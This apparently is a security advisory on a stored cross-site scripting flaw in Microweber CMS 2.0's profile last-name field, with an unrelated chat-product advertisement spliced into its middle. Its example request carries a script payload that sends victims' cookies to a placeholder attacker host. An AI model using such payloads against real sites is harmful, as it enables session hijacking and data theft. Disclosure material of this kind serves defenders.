Overview
The CVE-2025-51504 vulnerability pertains to a Cross-Site Scripting (XSS) flaw found in Microweber CMS 2.0. This vulnerability affects the ‘/projects/profile’ homepage endpoint via the last name field. The implications of this vulnerability are significant, potentially leading to a system compromise and data leakage. Any system or entity utilizing Microweber CMS 2.0 should be aware of this vulnerability and take immediate corrective action.
Vulnerability Summary
CVE ID: CVE-2025-51504
Severity: High (7.6 CVSS Score)
Attack Vector: Remote Network
Privileges Required: None
User Interaction: Required
Impact: System compromise and data leakage
Affected Products
A new way to communicate
Ameeba Chat is built on encrypted identity, not personal profiles.
Message, call, share files, and coordinate with identities kept separate.
- • Encrypted identity
- • Ameeba Chat authenticates access
- • Aliases and categories
- • End-to-end encrypted chat, calls, and files
- • Secure notes for sensitive information
Private communication, rethought.
Product | Affected Versions
Microweber CMS | 2.0
How the Exploit Works
An attacker can exploit this vulnerability by injecting malicious scripts into the last name field on the affected endpoint. When other users or administrators view these injected scripts, the scripts get executed within the context of their user session. This could allow the attacker to hijack user sessions, deface web sites, or redirect the user to malicious sites.
Conceptual Example Code
Here’s a conceptual example of how an attacker might exploit this vulnerability:
POST /projects/profile HTTP/1.1
Host: vulnerable-site.com
Content-Type: application/x-www-form-urlencoded
last_name=<script>new Image().src='http://attacker-site.com/steal.php?cookie='+document.cookie;</script>
In this example, the attacker sends a POST request to the vulnerable endpoint (‘/projects/profile’) with a malicious payload in the last_name field. This script, when executed, would send the user’s cookie to the attacker’s server, effectively allowing the attacker to hijack the user’s session.
